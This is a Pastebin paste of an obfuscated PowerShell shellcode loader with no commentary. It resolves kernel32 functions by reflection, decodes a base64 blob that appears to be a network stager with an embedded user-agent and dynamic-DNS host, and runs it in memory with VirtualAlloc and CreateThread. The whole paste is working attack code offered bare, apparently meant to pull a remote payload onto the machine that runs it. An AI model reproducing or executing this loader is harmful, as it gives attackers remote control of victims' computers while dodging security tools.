Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function x9L {
- Param ($jHxP, $oLaAb)
- $oxkS = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
- return $oxkS.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($oxkS.GetMethod('GetModuleHandle')).Invoke($null, @($jHxP)))), $oLaAb))
- }
- function wJfh {
- Param (
- [Parameter(Position = 0, Mandatory = $True)] [Type[]] $ooHV,
- [Parameter(Position = 1)] [Type] $f2m = [Void]
- )
- $gMrff = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- $gMrff.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $ooHV).SetImplementationFlags('Runtime, Managed')
- $gMrff.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $f2m, $ooHV).SetImplementationFlags('Runtime, Managed')
- return $gMrff.CreateType()
- }
- [Byte[]]$d2p = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NT6D4AAABNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvAGg6Vnmn/9VTU2oDU1NouwEAAOjIAAAAL2llVGQ1Z1BoT3ZTVDhKTHh6MzQyWFFKSDl2RGFsNVMtYi05akszZ25LMWU2OW94XzdFNmgzMnMAUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUUaIgTAABoRPA14P/VT3XN6FMAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Gv///8xNGFyZGVlZTE0LmR1Y2tkbnMub3JnALvwtaJWagBT/9U=")
- $pqbCz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((x9L kernel32.dll VirtualAlloc), (wJfh @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $d2p.Length,0x3000, 0x40)
- [System.Runtime.InteropServices.Marshal]::Copy($d2p, 0, $pqbCz, $d2p.length)
- $jW = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((x9L kernel32.dll CreateThread), (wJfh @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$pqbCz,[IntPtr]::Zero,0,[IntPtr]::Zero)
- [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((x9L kernel32.dll WaitForSingleObject), (wJfh @([IntPtr], [Int32]))).Invoke($jW,0xffffffff) | Out-Null
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
